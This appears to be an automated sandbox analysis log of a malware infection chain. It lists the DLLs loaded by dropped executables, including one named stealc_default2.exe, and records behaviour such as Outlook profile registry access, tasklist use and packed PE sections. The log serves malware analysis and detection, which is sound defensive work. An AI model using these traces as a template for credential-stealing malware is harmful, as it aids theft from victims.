Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\6rxotqIg7H.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1000129001\caesium-image-compressor.exe	Section loaded: umpdc.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000191001\BitcoinCore.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1000228001\PureSyncInst.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000234001\runtime.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: apphelp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: wininet.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: sspicli.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: iertutil.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: wldp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: profapi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: winhttp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: mswsock.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: winnsi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: urlmon.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: srvcli.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: netutils.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: schannel.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: msasn1.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: dpapi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: gpapi.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: propsys.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: edputil.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: wintypes.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: appresolver.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: slc.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: userenv.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: sppc.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\1000238002\Amadeus.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll

Source: C:\Users\user\Desktop\OmnqazpM3P.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Source: OmnqazpM3P.exe

Static file information: File size 1904128 > 1048576

Source: OmnqazpM3P.exe

Static PE information: Raw size of ogvicfhk is bigger than: 0x100000 < 0x19f200

Source:	Binary string: mozglue.pdbP source: stealc_default2.exe, 00000014.00000002.3059192881.000000006C23D000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: nss3.pdb@ source: stealc_default2.exe, 00000014.00000002.3059535907.000000006C3FF000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: c:\rje\tg\3fl4\obj\Re\ease\etf.pdb source: axplong.exe, 00000006.00000002.3380519963.0000000000C4A000.00000004.00000020.00020000.00000000.sdmp, crypted.exe.6.dr
Source:	Binary string: BitLockerToGo.pdb source: caesium-image-compressor.exe, 00000015.00000002.2975464614.0000000001A80000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 0000002C.00000003.3228961940.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: BitcoinCore.exe, 00000017.00000002.3258029489.0000000004692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: BitcoinCore.exe, 00000017.00000002.3258029489.0000000004692000.00000004.00000020.00020000.00000000.sdmp
